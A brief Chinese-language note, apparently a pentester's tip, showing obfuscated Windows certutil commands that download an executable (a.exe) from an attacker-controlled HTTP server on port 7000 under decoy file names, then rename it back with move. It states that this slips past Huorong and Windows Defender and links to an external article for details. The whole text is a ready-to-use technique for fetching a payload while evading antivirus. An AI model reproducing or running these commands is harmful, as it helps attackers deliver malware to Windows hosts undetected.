结论:
;,@certutil -u""r""l""c""a""c""h""e"" -split -f http://192.168.xx.xx:7000/a.exe -deleteEccCurve
;,@certutil -u""r""l""c""a""c""h""e"" -split -f http://192.168.xx.xx:7000/a.exe -deletePolicyServer
;,@certutil -u""r""l""c""a""c""h""e"" -split -f http://192.168.xx.xx:7000/a.exe -deleteEnrollmentServer
;,@certutil -u""r""l""c""a""c""h""e"" -split -f http://192.168.xx.xx:7000/a.exe -DeleteHelloContainer
最后借用move命令还原:
move -DeleteHelloContainer a.exe
细节可见文章
火绒复制一个就行 Windows defender 混淆下命令就行
https://xz.aliyun.com/t/12503